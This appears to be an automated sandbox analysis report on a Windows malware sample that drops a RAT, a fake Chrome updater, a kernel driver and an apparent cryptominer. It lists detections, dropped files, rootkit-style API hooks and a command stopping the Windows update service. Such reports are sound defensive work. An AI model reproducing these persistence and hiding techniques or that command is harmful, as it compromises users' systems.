Source:	Binary string: C:\Users\attat\source\repos\Millenium RAT Buillder V2.8\Millenium\Millenium\obj\Release\net462\conhost.pdb source: main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\bin\2015\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: costura.costura.pdb.compressed source: main.exe, 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000001.00000002.1666681967.00007FFDFB78F000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\bin\2015\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed5microsoft.win32.primitivesccostura.microsoft.win32.primitives.dll.compressed source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp

Source: hacn.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: hacn.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: hacn.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: hacn.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: hacn.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: main.exe.4.dr, AssemblyLoader.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: Update.exe.5.dr, AssemblyLoader.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])

Yara detected Costura Assembly Loader

Source: Yara match	File source: 5.0.main.exe.244178405b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.main.exe.244176d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.main.exe.244176def04.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7748, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED

Source: main.exe.4.dr

Static PE information: 0xEE92FC16 [Thu Nov 1 12:09:58 2096 UTC]

Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe

File created: C:\ProgramData\__tmp_rar_sfx_access_check_5774593

Jump to behavior

Source: main.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x59e690
Source: wxyubnjmnlae.tmp.25.dr	Static PE information: real checksum: 0x0 should be: 0x520b71
Source: s.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x7459da
Source: Update.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x59e690
Source: updater.exe.6.dr	Static PE information: real checksum: 0x55ddc3 should be: 0x56311d
Source: setup.exe.4.dr	Static PE information: real checksum: 0x55ddc3 should be: 0x56311d
Source: wxyubnjmnlae.tmp.6.dr	Static PE information: real checksum: 0x0 should be: 0x316d6

Source: hacn.exe	Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.0.dr	Static PE information: section name: .00cfg
Source: python310.dll.0.dr	Static PE information: section name: PyRuntim
Source: s.exe.0.dr	Static PE information: section name: .didat
Source: setup.exe.4.dr	Static PE information: section name: .xdata
Source: updater.exe.6.dr	Static PE information: section name: .xdata
Source: wxyubnjmnlae.tmp.25.dr	Static PE information: section name: _RANDOMX
Source: wxyubnjmnlae.tmp.25.dr	Static PE information: section name: _TEXT_CN
Source: wxyubnjmnlae.tmp.25.dr	Static PE information: section name: _TEXT_CN
Source: wxyubnjmnlae.tmp.25.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D36506C push rcx; iretd	0_2_00007FF61D36506D
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000FF640 push ecx; ret	4_2_000FF653
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000FEB78 push eax; ret	4_2_000FEB96
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CA3E86 push rdi; ret	5_2_00007FFDF7CA3E92
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D17964 push rax; retf	5_2_00007FFDF7D17965
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CA38ED push rdi; ret	5_2_00007FFDF7CA38F4
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CCC941 push r8; ret	5_2_00007FFDF7CCC943
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8A4A6F pushad ; retf	5_2_00007FFD9B8A4A91
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8AB442 push ebx; ret	5_2_00007FFD9B8AB44A
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8A782E pushad ; iretd	5_2_00007FFD9B8A785D
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8B1715 push ebp; iretd	5_2_00007FFD9B8B1718
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC62ACDD push rcx; retf 003Fh	22_2_00000225DC62ACDE
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC65C6DD push rcx; retf 003Fh	22_2_00000225DC65C6DE
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC68ACDD push rcx; retf 003Fh	22_2_00000225DC68ACDE
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC6BC6DD push rcx; retf 003Fh	22_2_00000225DC6BC6DE
Source: C:\Windows\System32\lsass.exe	Code function: 26_2_00000202C0ACACDD push rcx; retf 003Fh	26_2_00000202C0ACACDE
Source: C:\Windows\System32\lsass.exe	Code function: 26_2_00000202C0AFC6DD push rcx; retf 003Fh	26_2_00000202C0AFC6DE
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002A6612EACDD push rcx; retf 003Fh	29_2_000002A6612EACDE
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002A66131C6DD push rcx; retf 003Fh	29_2_000002A66131C6DE
Source: C:\Windows\System32\dwm.exe	Code function: 30_2_000002BAAF00ACDD push rcx; retf 003Fh	30_2_000002BAAF00ACDE
Source: C:\Windows\System32\dwm.exe	Code function: 30_2_000002BAAF03C6DD push rcx; retf 003Fh	30_2_000002BAAF03C6DE
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_0000026A879AACDD push rcx; retf 003Fh	51_2_0000026A879AACDE

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Windows\TEMP\gqxqtdeqxchk.sys

Source: C:\ProgramData\main.exe	File created: C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75722\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75722\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75722\python310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75722\_lzma.pyd	Jump to dropped file
Source: C:\ProgramData\setup.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75722\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75722\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	File created: C:\ProgramData\setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75722\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75722\unicodedata.pyd	Jump to dropped file
Source: C:\ProgramData\main.exe	File created: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75722\_bz2.pyd	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\gqxqtdeqxchk.sys	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75722\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	File created: C:\ProgramData\main.exe	Jump to dropped file
Source: C:\ProgramData\setup.exe	File created: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\wxyubnjmnlae.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	File created: C:\ProgramData\setup.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	File created: C:\ProgramData\main.exe			Jump to dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\gqxqtdeqxchk.sys			Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\wxyubnjmnlae.tmp			Jump to dropped file

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\ProgramData\setup.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WXYUBNJMNLAE.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\WXYUBNJMNLAE.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\WXYUBNJMNLAE.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\WXYUBNJMNLAE.TMP

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\Users\user\Desktop\hacn.exe

Code function: 0_2_00007FF61D326F00 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00007FF61D326F00

Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
